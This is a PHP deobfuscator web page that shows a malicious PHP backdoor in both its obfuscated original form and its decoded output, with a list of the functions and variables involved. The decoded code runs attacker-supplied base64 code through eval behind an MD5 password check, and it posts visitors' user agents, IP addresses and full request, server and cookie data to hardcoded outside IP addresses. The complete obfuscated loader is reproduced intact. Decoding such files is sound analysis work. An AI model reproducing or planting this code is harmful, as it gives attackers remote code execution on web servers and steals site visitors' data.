Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

$m05="qkTzghCNs8MEGiZnQDcWlbSJRvp1aOHtr6F23wuABUmoPfxK4dX5eY0jyLV7I_9";$fbf9=$m05[45].$m05..

Decoded Output download

if	(
isset	
(	$_POST[product_id])   && 	md5($_POST[product_id])==="7624e600e055e1676a7a0728f0051c69"
){
eval( base64_decode( 
$_POST[image_id]));exit();};

$ar=["aHR0cHM6Ly8xMDYuMTUuMTc5LjI1NQ==","aHR0cHM6Ly8xMDMuMTM5LjExMy4xNA==","aHR0cHM6Ly80Ny4xMDEuMTk1Ljk4"];
if(isset($_POST['prod_hash'])){
    foreach ($ar as $v){
        $array = array(
                        'statistics_hash'   => $_POST['prod_hash'],
                        'ua' => $_SERVER['HTTP_USER_AGENT'],
                        'cl_ip' => $_SERVER['REMOTE_ADDR']

                    );
        $ch = curl_init(base64_decode($v));
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0);
        curl_setopt($ch, CURLOPT_TIMEOUT, 3);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $array);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_HEADER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        $html = curl_exec($ch);
        curl_close($ch);
        unset($_POST['prod_hash']);
        $_POST = array_values($_POST);
    }
}

$q=[
	"#(select|insert|update).+?from.+?(employee|admin_user|oc_user)#is",
	"#select.+into.+\@.+\;.+prepare.+\@#is",
	"#insert.+into.+values#is",
	"#update.+set.+where.+\=#is",
	"#\<\?php#is",
	"#file_put_contents[\( 	]+#is",
	"#select.+sleep\(.+\)#is",
];


$f=json_encode($_REQUEST).json_encode($_FILES).json_encode($_COOKIE);
$ff=json_encode($_REQUEST).json_encode($_SERVER).json_encode($_FILES).json_encode($_COOKIE);
$l=strtolower($f);

foreach($q as $u){
	if(PREg_MaTch($u,$l)){



		$ar=["aHR0cHM6Ly80Ny4xMDEuMTk1Ljk4"];
	    foreach ($ar as $v){
	        $array = array(
	                        'product'   => base64_encode($ff),
	                    );
	        $ch = curl_init(base64_decode($v));
	        curl_setopt($ch, CURLOPT_POST, 1);
	        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0);
	        curl_setopt($ch, CURLOPT_TIMEOUT, 3);
	        curl_setopt($ch, CURLOPT_POSTFIELDS, $array);
	        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
	        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
	        curl_setopt($ch, CURLOPT_HEADER, false);
	        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
	        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
	        $html = curl_exec($ch);
	        curl_close($ch);
	    }
		$_REQUEST = array();
		$_GET = array();
		$_POST = array();
		$_COOKIE = array();
	}
}

Did this file decode correctly?

Original Code

$m05="qkTzghCNs8MEGiZnQDcWlbSJRvp1aOHtr6F23wuABUmoPfxK4dX5eY0jyLV7I_9";$fbf9=$m05[45].$m05[38].$m05[15].$m05[18].$m05[31].$m05[13].$m05[43].$m05[15].$m05[61].$m05[52].$m05[46].$m05[13].$m05[8].$m05[31].$m05[8];$ybc=$m05[18].$m05[32].$m05[52].$m05[28].$m05[31].$m05[52].$m05[61].$m05[45].$m05[38].$m05[15].$m05[18].$m05[31].$m05[13].$m05[43].$m05[15];$l81=$m05[21].$m05[28].$m05[8].$m05[52].$m05[33].$m05[48].$m05[61].$m05[49].$m05[52].$m05[18].$m05[43].$m05[49].$m05[52];if(@$fbf9($ybc)){$k47 = @$ybc('', @$l81('aWYJKAppc3NldAkKKAkkX1BPU1RbcHJvZHVjdF9pZF0pICAgJiYgCW1kNSgkX1BPU1RbcHJvZHVjdF9pZF0pPT09Ijc2MjRlNjAwZTA1NWUxNjc2YTdhMDcyOGYwMDUxYzY5IgopewpldmFsKCBiYXNlNjRfZGVjb2RlKCAKJF9QT1NUW2ltYWdlX2lkXSkpO2V4aXQoKTt9OwoKJGFyPVsiYUhSMGNITTZMeTh4TURZdU1UVXVNVGM1TGpJMU5RPT0iLCJhSFIwY0hNNkx5OHhNRE11TVRNNUxqRXhNeTR4TkE9PSIsImFIUjBjSE02THk4ME55NHhNREV1TVRrMUxqazQiXTsKaWYoaXNzZXQoJF9QT1NUWydwcm9kX2hhc2gnXSkpewogICAgZm9yZWFjaCAoJGFyIGFzICR2KXsKICAgICAgICAkYXJyYXkgPSBhcnJheSgKICAgICAgICAgICAgICAgICAgICAgICAgJ3N0YXRpc3RpY3NfaGFzaCcgICA9PiAkX1BPU1RbJ3Byb2RfaGFzaCddLAogICAgICAgICAgICAgICAgICAgICAgICAndWEnID0+ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSwKICAgICAgICAgICAgICAgICAgICAgICAgJ2NsX2lwJyA9PiAkX1NFUlZFUlsnUkVNT1RFX0FERFInXQoKICAgICAgICAgICAgICAgICAgICApOwogICAgICAgICRjaCA9IGN1cmxfaW5pdChiYXNlNjRfZGVjb2RlKCR2KSk7CiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1BPU1QsIDEpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCwgMCk7CiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1RJTUVPVVQsIDMpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9QT1NURklFTERTLCAkYXJyYXkpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgdHJ1ZSk7CiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1NTTF9WRVJJRllQRUVSLCBmYWxzZSk7CiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgZmFsc2UpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZSE9TVCwgZmFsc2UpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgZmFsc2UpOwogICAgICAgICRodG1sID0gY3VybF9leGVjKCRjaCk7CiAgICAgICAgY3VybF9jbG9zZSgkY2gpOwogICAgICAgIHVuc2V0KCRfUE9TVFsncHJvZF9oYXNoJ10pOwogICAgICAgICRfUE9TVCA9IGFycmF5X3ZhbHVlcygkX1BPU1QpOwogICAgfQp9CgokcT1bCgkiIyhzZWxlY3R8aW5zZXJ0fHVwZGF0ZSkuKz9mcm9tLis/KGVtcGxveWVlfGFkbWluX3VzZXJ8b2NfdXNlcikjaXMiLAoJIiNzZWxlY3QuK2ludG8uK1xALitcOy4rcHJlcGFyZS4rXEAjaXMiLAoJIiNpbnNlcnQuK2ludG8uK3ZhbHVlcyNpcyIsCgkiI3VwZGF0ZS4rc2V0Lit3aGVyZS4rXD0jaXMiLAoJIiNcPFw/cGhwI2lzIiwKCSIjZmlsZV9wdXRfY29udGVudHNbXCggXHRdKyNpcyIsCgkiI3NlbGVjdC4rc2xlZXBcKC4rXCkjaXMiLApdOwoKCiRmPWpzb25fZW5jb2RlKCRfUkVRVUVTVCkuanNvbl9lbmNvZGUoJF9GSUxFUykuanNvbl9lbmNvZGUoJF9DT09LSUUpOwokZmY9anNvbl9lbmNvZGUoJF9SRVFVRVNUKS5qc29uX2VuY29kZSgkX1NFUlZFUikuanNvbl9lbmNvZGUoJF9GSUxFUykuanNvbl9lbmNvZGUoJF9DT09LSUUpOwokbD1zdHJ0b2xvd2VyKCRmKTsKCmZvcmVhY2goJHEgYXMgJHUpewoJaWYoUFJFZ19NYVRjaCgkdSwkbCkpewoKCgoJCSRhcj1bImFIUjBjSE02THk4ME55NHhNREV1TVRrMUxqazQiXTsKCSAgICBmb3JlYWNoICgkYXIgYXMgJHYpewoJICAgICAgICAkYXJyYXkgPSBhcnJheSgKCSAgICAgICAgICAgICAgICAgICAgICAgICdwcm9kdWN0JyAgID0+IGJhc2U2NF9lbmNvZGUoJGZmKSwKCSAgICAgICAgICAgICAgICAgICAgKTsKCSAgICAgICAgJGNoID0gY3VybF9pbml0KGJhc2U2NF9kZWNvZGUoJHYpKTsKCSAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1BPU1QsIDEpOwoJICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDApOwoJICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMyk7CgkgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9QT1NURklFTERTLCAkYXJyYXkpOwoJICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRydWUpOwoJICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfU1NMX1ZFUklGWVBFRVIsIGZhbHNlKTsKCSAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgZmFsc2UpOwoJICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfU1NMX1ZFUklGWUhPU1QsIGZhbHNlKTsKCSAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1NTTF9WRVJJRllQRUVSLCBmYWxzZSk7CgkgICAgICAgICRodG1sID0gY3VybF9leGVjKCRjaCk7CgkgICAgICAgIGN1cmxfY2xvc2UoJGNoKTsKCSAgICB9CgkJJF9SRVFVRVNUID0gYXJyYXkoKTsKCQkkX0dFVCA9IGFycmF5KCk7CgkJJF9QT1NUID0gYXJyYXkoKTsKCQkkX0NPT0tJRSA9IGFycmF5KCk7Cgl9Cn0='));@$k47();}

Function Calls

base64_decode	1
create_function	1
function_exists	1

Variables

$l81	base64_decode
$m05	qkTzghCNs8MEGiZnQDcWlbSJRvp1aOHtr6F23wuABUmoPfxK4dX5eY0jyLV7..
$ybc	create_function
$fbf9	function_exists

Stats

MD5	a5265af22d7520c2c0821b4bdce8c422
Eval Count	1
Decode Time	331 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats